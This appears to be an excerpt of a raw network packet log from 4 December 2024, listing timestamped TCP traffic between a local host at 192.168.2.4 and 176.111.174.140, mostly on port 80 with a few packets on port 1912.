                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.752654076 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.753350973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.753592968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.753703117 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.754384041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.754479885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.754599094 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.755507946 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.755551100 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.755822897 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.756649971 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.756715059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.756906986 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.757752895 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.758090019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.758207083 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.758857012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.758946896 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.759074926 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.759994030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.760143995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.760250092 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.761109114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.761228085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.761444092 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.762279987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.762351036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.762459040 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.763353109 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.763447046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.763559103 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.764502048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.764576912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.764725924 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.765832901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.765932083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.766088009 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.766832113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.766946077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.767106056 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.768022060 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.768102884 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.768217087 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.769156933 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.769310951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.769424915 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.770056009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.770103931 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.770374060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.771254063 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.771337032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.771485090 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.772281885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.772413015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.772511005 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.773475885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.773587942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.773695946 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.774549961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.774646997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.774751902 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.775722027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.775774002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.776072979 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.776773930 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.776896954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.777018070 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.777915001 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.778112888 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.778265953 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.778989077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.779088974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.780144930 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.780178070 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.780363083 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.781245947 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.781366110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.781645060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.783389091 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.783418894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.783428907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.783643007 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.917068005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.917248011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.917351961 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.917526007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.917618990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.917917967 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.918292999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.918402910 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.918592930 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.919430017 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.919557095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.919864893 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.920557976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.920684099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.920813084 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.921715021 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.921878099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.922007084 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.922758102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.922908068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.923015118 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.924032927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.924097061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.924247026 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.925003052 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.925051928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.925244093 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.926094055 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.926204920 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.926331043 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.927248001 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.927326918 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.927438021 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.928361893 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.928505898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.928627014 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.929480076 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.929656982 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.929786921 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.930654049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.930718899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.930835009 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.931701899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.931852102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.931957960 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.932827950 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.932934046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.933093071 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.933969975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.934189081 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.934298038 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.935117960 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.935215950 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.935331106 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.936212063 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.936326027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.936424971 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.937355042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.937429905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.937568903 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.938448906 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.938589096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.938699007 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.939568043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.939594030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.939711094 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.940700054 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.940819025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.940922022 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.941778898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.941885948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.942081928 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.943030119 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.943181038 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.943195105 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.943316936 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.944178104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.944298983 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.944427013 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.945307016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.945386887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.945698977 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.946252108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.946361065 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.946501970 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.947398901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.947488070 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.947634935 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.948625088 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.948698044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.948915958 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.949625969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.949822903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.950006008 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.950737000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.950824976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.950969934 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.951865911 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.951922894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.952223063 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.952980995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.953089952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.953284025 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.954133034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.954307079 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.954411030 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.955230951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.955344915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.955475092 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.956331968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.956413031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.956515074 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.957556963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.957597017 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.957693100 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.958597898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.958739042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.958880901 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.959749937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.959832907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.959964037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.960833073 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.960999966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.961175919 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.961956978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.962014914 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.962166071 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.963124037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.963316917 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.963525057 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.964289904 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.964416027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.964521885 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.965320110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.965521097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.965647936 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.966492891 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.966563940 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.966706991 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.967631102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.967726946 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.967839003 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.968648911 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.968786001 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.969022036 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.969850063 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.969930887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.970065117 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.970933914 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.971086025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.971199989 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.972059011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.972193956 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.972290039 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.973164082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.973349094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.973439932 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.974276066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.974556923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.974661112 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.975359917 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.990974903 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.100379944 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.109476089 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.110183954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.110311985 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.111804962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.112011909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.112066031 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.112153053 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.113184929 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.113198996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.113212109 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.113339901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.113346100 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.113346100 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.114485025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.114562035 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.114666939 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.115662098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.115675926 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.115735054 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.116630077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.116698980 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.116801023 CET8049738176.111.174.140192.168.2.4
